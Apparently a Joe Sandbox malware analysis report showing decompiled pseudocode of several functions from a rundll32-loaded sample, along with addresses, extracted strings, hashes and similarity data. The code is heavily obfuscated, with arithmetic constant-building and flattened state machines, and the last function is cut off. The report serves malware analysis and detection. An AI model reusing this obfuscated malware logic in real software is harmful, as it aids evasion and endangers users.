				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E007B6C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E007C13AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E007BDCF7(_v1084, 0x7a1000, __eflags);
						_t256 =  *0x7c3e10; // 0x0
						_t272 =  *0x7c3e10; // 0x0
						E007A47CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E007AA8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E007AB6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E007AB1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E007B473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E007A3E3F();
					goto L8;
				}
				_t236 =  *0x7c3e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}

0x007b7dd5
0x007b7ddb
0x007b7de2
0x007b7de7
0x007b7dec
0x007b7df4
0x007b7dfc
0x007b7e0d
0x007b7e11
0x007b7e1f
0x007b7e24
0x007b7e2a
0x007b7e32
0x007b7e3a
0x007b7e3f
0x007b7e47
0x007b7e4f
0x007b7e54
0x007b7e5c
0x007b7e64
0x007b7e6c
0x007b7e74
0x007b7e7c
0x007b7e88
0x007b7e8d
0x007b7e93
0x007b7e9b
0x007b7ea3
0x007b7eab
0x007b7eb3
0x007b7ebb
0x007b7ec3
0x007b7ecf
0x007b7ed2
0x007b7ed6
0x007b7ede
0x007b7ee6
0x007b7eeb
0x007b7ef3
0x007b7efb
0x007b7f03
0x007b7f0b
0x007b7f18
0x007b7f1c
0x007b7f24
0x007b7f2c
0x007b7f34
0x007b7f39
0x007b7f3d
0x007b7f45
0x007b7f4d
0x007b7f55
0x007b7f5a
0x007b7f62
0x007b7f6a
0x007b7f72
0x007b7f7a
0x007b7f87
0x007b7f8b
0x007b7f90
0x007b7f98
0x007b7fa0
0x007b7fa8
0x007b7fb0
0x007b7fbd
0x007b7fca
0x007b7fd7
0x007b7fdf
0x007b7fe4
0x007b7fec
0x007b7ff4
0x007b7ffc
0x007b8001
0x007b8009
0x007b8011
0x007b8019
0x007b801e
0x007b8026
0x007b802e
0x007b8036
0x007b803b
0x007b8043
0x007b804b
0x007b8058
0x007b805c
0x007b8064
0x007b806c
0x007b8074
0x007b807c
0x007b8084
0x007b808c
0x007b8094
0x007b809c
0x007b80a4
0x007b80ac
0x007b80b9
0x007b80bd
0x007b80c5
0x007b80cd
0x007b80d2
0x007b80da
0x007b80e2
0x007b80ea
0x007b80f2
0x007b80fa
0x007b8102
0x007b810c
0x007b8110
0x00000000
0x007b8118
0x007b812a
0x007b81f0
0x007b81f5
0x007b8200
0x007b8201
0x007b8210
0x007b8215
0x007b8218
0x00000000
0x007b8218
0x007b8132
0x007b8164
0x007b816d
0x007b8175
0x007b8186
0x007b819e
0x007b81b1
0x007b81c6
0x007b81cb
0x007b81ce
0x00000000
0x007b81ce
0x007b813a
0x007b825a
0x007b8263
0x007b826d
0x00000000
0x007b827c
0x007b8142
0x007b815d
0x007b8155
0x007b8155
0x00000000
0x007b8155
0x007b8146
0x007b8239
0x007b8239
0x007b823f
0x00000000
0x00000000
0x00000000
0x007b823f
0x007b8150
0x00000000
0x007b8150
0x007b8222
0x007b8227
0x007b822e
0x007b8237
0x00000000
0x007b8237
0x007b8230
0x00000000

Strings

/, xrefs: 007B8094
|[a, xrefs: 007B80FA
g^/h, xrefs: 007B80AC
MC=, xrefs: 007B7F34

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: MC=$g^/h$|[a$/
API String ID: 0-1545830693
Opcode ID: 03441db430b1dcf5fdedfba8d4e15e429a0f76d0d7a3b6a9b602095e2b738769
Instruction ID: 4c45f9b040d7a4724578d495db6978219bb691b553e33b34f5677cdb1c140d2a
Opcode Fuzzy Hash: 03441db430b1dcf5fdedfba8d4e15e429a0f76d0d7a3b6a9b602095e2b738769
Instruction Fuzzy Hash: FAC110B11083858FC3A8CF25C58A95FBBE1FBC1758F508A1DF19656260D7B98A0ACF47

Uniqueness

Uniqueness Score: -1.00%

Function 007BA2E8 Relevance: 5.2, Strings: 4, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007BA2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E007BC032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E007B8519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E007A7FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E007AED7E(_v88, _t193, _v56, _t197, _t226);
												E007B8519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E007A7FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}

0x007ba2e8
0x007ba2e8
0x007ba2ef
0x007ba2f3
0x007ba2f7
0x007ba2ff
0x007ba304
0x007ba30c
0x007ba314
0x007ba31c
0x007ba321
0x007ba329
0x007ba331
0x007ba339
0x007ba342
0x007ba34b
0x007ba350
0x007ba355
0x007ba35b
0x007ba363
0x007ba36b
0x007ba373
0x007ba378
0x007ba37d
0x007ba385
0x007ba38d
0x007ba395
0x007ba39d
0x007ba3a5
0x007ba3b1
0x007ba3b6
0x007ba3bc
0x007ba3c4
0x007ba3cc
0x007ba3d8
0x007ba3db
0x007ba3df
0x007ba3e7
0x007ba3f4
0x007ba3f8
0x007ba400
0x007ba408
0x007ba410
0x007ba418
0x007ba420
0x007ba428
0x007ba430
0x007ba438
0x007ba440
0x007ba448
0x007ba450
0x007ba45d
0x007ba461
0x007ba469
0x007ba471
0x007ba479
0x007ba481
0x007ba486
0x007ba48e
0x007ba49b
0x007ba49f
0x007ba4a7
0x007ba4af
0x007ba4b7
0x007ba4bf
0x007ba4c7
0x007ba4cf
0x007ba4d3
0x007ba4d7
0x007ba4df
0x007ba4e7
0x007ba4ef
0x007ba4f4
0x007ba4f9
0x007ba501
0x007ba509
0x007ba511
0x00000000
0x007ba519
0x007ba519
0x007ba519
0x007ba52b
0x007ba559
0x007ba55b
0x007ba55e
0x007ba564
0x007ba63c
0x007ba645
0x007ba56a
0x007ba56a
0x007ba570
0x007ba638
0x007ba63a
0x007ba651
0x007ba657
0x007ba659
0x00000000
0x00000000
0x00000000
0x007ba576
0x007ba576
0x007ba57a
0x007ba57c
0x007ba5df
0x007ba5df
0x007ba5e3
0x007ba5e3
0x007ba5e7
0x00000000
0x007ba57e
0x007ba582
0x007ba58f
0x007ba590
0x007ba591
0x007ba595
0x007ba59a
0x007ba5a2
0x00000000
0x007ba5a8
0x007ba5b4
0x007ba5c2
0x007ba5c7
0x007ba5cb
0x007ba5cd
0x007ba5d0
0x007ba5d3
0x007ba5d7
0x007ba5dd
0x00000000
0x00000000
0x00000000
0x00000000
0x007ba5dd
0x007ba5a2
0x007ba57c
0x007ba570
0x007ba52d
0x007ba533
0x00000000
0x007ba539
0x007ba539
0x00000000
0x007ba539
0x007ba533
0x007ba65d
0x007ba665
0x007ba665
0x007ba5f5
0x007ba604
0x007ba605
0x007ba606
0x007ba60b
0x007ba611
0x007ba61b
0x007ba61f
0x00000000
0x007ba613
0x007ba613
0x007ba617
0x00000000
0x007ba617
0x00000000
0x007ba624
0x007ba624
0x007ba628
0x007ba634
0x00000000
0x007ba634

Strings

s, xrefs: 007BA321
YIa, xrefs: 007BA428
mU, xrefs: 007BA4E7
!J, xrefs: 007BA4AF

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !J$YIa$mU$s
API String ID: 0-3335770892
Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
Instruction ID: 6c8a291748c2efef1402390f9844c5786979727c57b7a9968c8e5dd2fc9be38c
Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
Instruction Fuzzy Hash: A59130B1909340ABC354DF29C18990BFBF1BBC5758F544A1EF99597220D3B8DA09CB43

Uniqueness

Uniqueness Score: -1.00%

Function 007A4EE3 Relevance: 5.2, Strings: 4, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007A4EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x7c3e10; // 0x0
				_t203 = E007AB6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E007AB23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E007BDCF7(_v56, 0x7a1000, _t248);
					_pop(_t221);
					E007A47CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E007AA8B0(_v60, _t207, _v76);
					E007B1F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}

0x007a4eec
0x007a4ef2
0x007a4ef9
0x007a4f00
0x007a4f04
0x007a4f08
0x007a4f0c
0x007a4f13
0x007a4f1a
0x007a4f21
0x007a4f28
0x007a4f2c
0x007a4f33
0x007a4f3a
0x007a4f41
0x007a4f45
0x007a4f4c
0x007a4f53
0x007a4f5a
0x007a4f67
0x007a4f6c
0x007a4f71
0x007a4f78
0x007a4f83
0x007a4f86
0x007a4f89
0x007a4f90
0x007a4f97
0x007a4fa5
0x007a4fa8
0x007a4fac
0x007a4fb3
0x007a4fba
0x007a4fc1
0x007a4fc8
0x007a4fcf
0x007a4fd6
0x007a4fde
0x007a4fdf
0x007a4fe2
0x007a4fe9
0x007a4ff0
0x007a4ff7
0x007a4ffe
0x007a5002
0x007a5009
0x007a5010
0x007a5017
0x007a501b
0x007a5022
0x007a5029
0x007a502d
0x007a5039
0x007a503c
0x007a5043
0x007a504a
0x007a5051
0x007a5055
0x007a505c
0x007a5063
0x007a506a
0x007a506e
0x007a5072
0x007a5076
0x007a507d
0x007a5084
0x007a508b
0x007a5094
0x007a5098
0x007a509f
0x007a50a6
0x007a50ad
0x007a50b4
0x007a50bb
0x007a50c8
0x007a50c9
0x007a50cc
0x007a50d3
0x007a50da
0x007a50de
0x007a50e5
0x007a50ec
0x007a50f0
0x007a50f4
0x007a50fb
0x007a5102
0x007a510e
0x007a5111
0x007a5115
0x007a5122
0x007a512e
0x007a513a
0x007a5147
0x007a514f
0x007a5151
0x007a5154
0x007a515c
0x007a5162
0x007a516d
0x007a5189
0x007a5196
0x007a51a8
0x007a51b0
0x007a51b8

Strings

0M*, xrefs: 007A4FE9
*X&R, xrefs: 007A50F4
@!x, xrefs: 007A4F13
7m_, xrefs: 007A4FC8

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: *X&R$0M*$7m_$@!x
API String ID: 1586166983-4050865940
Opcode ID: ad2b6d4069c3f3337c1092bb63d8c8eef837f69341d1df47be2ada7b6aa6c7be
Instruction ID: c7ff9f60e110af3b69aa3e25825ff0772eaf305b92da6f326268d54033f71f17
Opcode Fuzzy Hash: ad2b6d4069c3f3337c1092bb63d8c8eef837f69341d1df47be2ada7b6aa6c7be
Instruction Fuzzy Hash: C1811271C0121DEFCF49DFA1D88A9EEBBB1FB44718F208118E411B6260D7B95A4ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 007AEA99 Relevance: 5.2, Strings: 4, Instructions: 153
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E007AEA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
